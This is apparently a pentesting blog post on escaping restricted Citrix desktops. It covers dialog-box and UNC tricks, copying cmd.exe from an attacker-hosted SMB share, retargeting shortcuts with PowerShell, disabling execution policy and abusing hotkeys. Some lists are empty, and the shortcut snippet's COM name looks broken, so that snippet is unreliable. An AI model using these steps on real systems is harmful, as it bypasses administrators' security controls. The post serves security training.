Citrix is a lock-down measure implemented in the desktop environment to minimize the potential impact of malicious staff members or compromised accounts. Administrators can restrict other users using critix from applications they desire such as cmd.exe or powershell.exe. In environments where minimum hardening is implemented, we can search for the applications but we can’t run them and in a restrictive lock-down environment we won’t see any results if we search for the application.
Usually accessing C:\windows\system32 through file explorer will cause an error , preventing direct access to critical system applications .
There are plenty of ways to breakout from a Citrix environment but we will go through
If we try to visit folders such as c:\Users or C:\windows\system32 it will result in an error due to the group policy in place to restrict users from browsing directories in the C:\ drive using file explorer
It is possible to use dialog boxes to bypass the restrictions implemented by group policy. There are plenty of desktop applications that allow users to navigate through system files
Accessing any application that uses a dialog box can give us a way to bypass the restriction. This can be tools such as
If we run any of these applications we will see that it allows the user to open a dialog box and search for files and folders inside the system. We can enter a UNC path. UNC stands for “Universal naming convention” which is used to access network resources and has the following format : \\server\share\folder\file . In our localhost, we can use the same concept to access files
Example : \\127.0.0.1\c$\users\username
In cases in which restrictions are placed upon the file explorer itself by Group policy, Alternative file systems like Q-DIR and Explorer++ can come in handy to bypass the restriction. Copying files from a smb share can also be done now which can be restricted otherwise.
Note: Explorer++ is highly recommended due to it being portable and being able to be executed directly without installation.
Similarly if we can’t edit default registry we can install other applications such as :
https://sourceforge.net/projects/simpregedit
https://sourceforge.net/projects/uberregedit
https://sourceforge.net/projects/sre/
Help menus can be in numerous formats but specially application help menus and then generic “Windows help and Support” menu can come quite handy .
These menus often have links and shortcuts to other applications such as Command Prompt or Control panel .
Smb share can me implemented on the attacker’s side to host applications such as command prompt, Portable Registry editors, etc …
To host a smb share we can use the Impacket-smb server :
On the Client side we can use net use to connect to the share :
C:\>net use \\10.10.xx.x\smb
net use \\10.10.xx.x\smb
The command completed successfully.
And lastly copy our desired binaries using Copy :
C:\WINDOWS\Temp>copy \\10.110.xx.x\smb\cmd.exe \windows\temp\cmd.exe
copy \\10.10.xx.x\smb\cmd.exe \windows\temp\cmd.exe
1 file(s) copied.
This can be exploited in system where minimal hardening is implemented so it may be denied to access directories such as C:\ but symbolic links can be used to bypass the restriction. File protocol handlers can also come in handy for opening up applications that otherwise would be unavailable.
This can come in handy when we want to use our own binaries on the system or write data to files for later usage. Temporary folders such as TEMP should be the first place we should look at and we can find the location of the directory using the %temp% system variable.
TIP : We can also utilize tools such as accesscheck.exe to find directories that we have write access over .
These restrictions are usually put in place by using white/black lists . and can filter
1. Filenames
2. File extensions
3. Regex patterns
4. etc …
We can usually bypass them by changing the name of our file or using tools with extensions that are allowed .
Example: if .exe is denied we can try to use .ps1
But if restrictions were put in place by a careful admin it’s pretty much impossible if not possible at all to bypass this restriction
If we can access a shortcut we can run an application of our choice. The window uses a link ( path) to connect the shortcut with the application and by changing the path we can execute other binaries.
We can right-click on a shortcut > Properties > Target and change the target to our desired binary
In cases where shortcuts are not available, We can transfer a shortcut file using an smb share or create a new shortcut using Powershell
$firstShell = New-Object -ComObject first.Shell
$TargetFile = "C:\Program Files\someprogram.exe"
$ShortcutFile = "C:\Users\user1\Desktop\mal.lnk"
$Shortcut = $firstShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
Note : This method can also be used to set up a quick persistence method although it's not the best way to do so
When script extensions such as .bat, .vbs, .ps, etc .. are configured to automatically execute their code using interpreters then we can use these scripts to download files, upload files, execute any binary, etc ..
We can create a new file with any of those extensions write code to execute the desired binary or perform the desired action and simply run it.
Powershell has an Execution policy ( A Security Measure) It controls whether users can load configuration files, such as the PowerShell profile, and run scripts, and whether scripts must be digitally signed before they can be run.
We can check the Status of Execution policy and
c:\> Get-Executionpolicy
C:\>Set-ExecutionPolicy unrestricted
For Further Details : https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4
TIP : We can also utilize tools such as powersploit which includes scripts that can come handy : https://github.com/PowerShellMafia/PowerSploit
RDP and Citrix both have there own hotkeys in place that correspond to operating system functions. We can use these hotkeys to bypass restrictions and so stuff such as Opening the windows security dialog box or displaying task manager
Remote Desktop Hotkeys:
Citrix ICA Hotkeys:
–
I hope you enjoyed this blog see you in the next one Ciao